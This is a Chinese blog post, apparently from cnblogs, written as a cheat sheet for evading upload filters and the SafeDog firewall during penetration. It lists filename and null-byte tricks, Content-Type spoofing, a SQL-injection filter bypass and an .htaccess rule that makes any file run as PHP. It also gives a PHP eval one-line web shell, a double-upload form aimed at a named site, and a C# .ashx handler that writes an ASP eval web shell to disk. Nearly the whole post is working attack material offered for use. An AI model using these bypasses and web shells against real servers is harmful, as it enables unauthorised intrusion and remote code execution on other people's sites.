突破各种安全软件 安全狗 继续渗透 上传
抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg
火狐FIREBUG修改本地JS
upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp
asa cer asaspp
隐藏表单,hidden修改数据,file
00 1.asp;.jpg
十六进制00: 1.asp
双文件上传
文件名大小写突破,对于LINUX等非WINDOWS系统
asp空格
asp.
/xx.jpg%00.php
cecerr aasasa
Content-Type: image/gif (原为 Content-Type: text/plain)
上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...
apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.
文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1
利用.htaccess突破限制:
1.首先上传.htaccess文件到某目录下,.htacess规则:
<FilesMatch "hahahe">
SetHandler application/x-httpd-php
</FilesMatch>
2.再上传一个文件,后缀任意写,内容:
"hahahe"<?php @eval($_POST['dukong']);?>
双文件上传突破:
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
<form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data"> <input name="FileName1" type="FILE" class="tx1" size="20"> <input name="FileName2" type="FILE" class="tx1" size="20"> <input type="submit" name="Submit" value="上传"> </form>
.ashx文件.NET 生成root.asp一句话马:
![](https://images.cnblogs.com/OutliningIndicators/ContractedBlock.gif)
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); file1.Write("<%eval request("mima")%>"); file1.Flush(); file1.Close(); } public bool IsReusable { get { return false; } } }
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 为什么说在企业级应用开发中,后端往往是效率杀手?
· 用 C# 插值字符串处理器写一个 sscanf
· Java 中堆内存和栈内存上的数据分布和特点
· 开发中对象命名的一点思考
· .NET Core内存结构体系(Windows环境)底层原理浅谈
· 为什么说在企业级应用开发中,后端往往是效率杀手?
· DeepSeek 解答了困扰我五年的技术问题。时代确实变了!
· 本地部署DeepSeek后,没有好看的交互界面怎么行!
· 趁着过年的时候手搓了一个低代码框架
· 推荐一个DeepSeek 大模型的免费 API 项目!兼容OpenAI接口!